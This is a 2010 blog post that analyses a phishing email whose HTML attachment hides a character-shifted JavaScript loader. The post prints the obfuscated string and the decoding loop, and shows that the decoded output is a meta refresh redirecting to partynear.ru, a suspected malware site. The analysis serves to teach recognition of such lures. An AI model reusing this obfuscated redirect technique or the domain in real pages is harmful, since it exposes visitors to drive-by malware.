Tuesday, September 21, 2010

Html virus inspired by a toy decoder ring

Here's a junior-level virus attempt that's inspired by the cereal-box decoder ring.
It's much easier to understand than most, and actually kind of fun to go through.

Subject: Please sign and send back to me asap


Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Forgot the Attachment - Here ya go!

Content-Type: text/html; name="85104attach.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="85104attach.html"

After decoding we have:

[less than symbol] script type='text/javascript'>

var s = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?";
m = "";
for (i = 0; i < s.length; i++) {

m starts out empty.
The loop iterates over the length of s, with i as the counter.

This is the important part, the loop body:
m += String.fromCharCode(s.charCodeAt(i) - 1);
}

Pretty basic: shift each letter to the one before it.
n becomes m, f becomes e.
Looking at an ASCII table shows the order of the punctuation (! becomes a space, # becomes ", etc.).
The first character, =, becomes a less-than symbol, but I removed it to keep things from executing.

meta http-equiv="refresh" content="0;url=http://partynear.ru" />

The rest is just small stuff to get the script to work. Actually I think the & is put in the wrong place.

m=[28th position] insert an &
m=[23rd position] insert an !

document.write(m) sends the string to the browser. The "refresh" is what makes it all happen.

So what is at partynear.ru?
Not much, according to the text-only browser Lynx: it says "Unexpected network read error".
jsunpack shows what appears to be a redirect sending you further into the site, into a Themes/card.js area that tries to run another JavaScript. It's not clear whether this is smoke, malware, or something else.
